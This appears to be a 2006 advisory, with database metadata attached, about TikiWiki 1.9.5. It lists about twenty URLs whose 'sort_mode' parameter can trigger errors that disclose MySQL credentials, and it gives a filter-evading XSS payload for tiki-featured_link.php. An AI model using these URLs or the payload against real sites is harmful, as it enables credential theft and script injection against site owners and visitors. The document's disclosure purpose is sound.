/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
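There's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-.
An anonymous user can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var; it is apparently the error output returned to the visitor that discloses the database credentials. The affected links are the following: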
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=
A proof of concept is available here: http://cockor.free.fr/PoC.swf
There's also an XSS here, in the "url" parameter:
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--
regards , securfrog
{"id": "SECURITYVULNS:DOC:14896", "bulletinFamily": "software", "title": "tikiwiki 1.9.5 mysql password disclosure & xss", "description": "/*==========================================*/\r\n//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)\r\n// Product: Tikiwiki \r\n// URL: http://tikiwiki.org/\r\n// RISK: critical\r\n/*==========================================*/\r\n\r\n\r\n\r\n\r\nthere's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-\r\na anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :\r\n/tiki-listpages.php?offset=0&sort_mode=\r\n/tiki-lastchanges.php?days=1&offset=0&sort_mode=\r\n/messu-archive.php?sort_mode=\r\n/messu-mailbox.php?sort_mode=\r\n/messu-sent.php?sort_mode=\r\n/tiki-directory_add_site.php?sort_mode=\r\n/tiki-directory_ranking.php?sort_mode=\r\n/tiki-directory_search.php?sort_mode=\r\n/tiki-forums.php?sort_mode=\r\n/tiki-view_forum.php?forumId=\r\n/tiki-friends.php?sort_mode=\r\n/tiki-list_blogs.php?sort_mode=\r\n/tiki-list_faqs.php?sort_mode=\r\n/tiki-list_trackers.php?sort_mode=\r\n/tiki-list_users.php?sort_mode=\r\n/tiki-my_tiki.php?sort_mode=\r\n/tiki-notepad_list.php?sort_mode=\r\n/tiki-orphan_pages.php?sort_mode=\r\n/tiki-shoutbox.php?sort_mode=\r\n/tiki-usermenu.php?sort_mode=\r\n/tiki-webmail_contacts.php?sort_mode=\r\n\r\na proof of concept is disponible here : http://cockor.free.fr/PoC.swf\r\n\r\nthere's also a xss here :\r\n/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--\r\n\r\nregards , securfrog ", "published": "2006-11-02T00:00:00", "modified": "2006-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14896", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 1234, "enchantments": {"score": {"value": -0.4, "vector": 
"NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6768"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6768"]}]}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645411895, "score": 1659803227}, "_internal": {"score_hash": "8c287a43815344f1fa9a7e6c86991d52"}}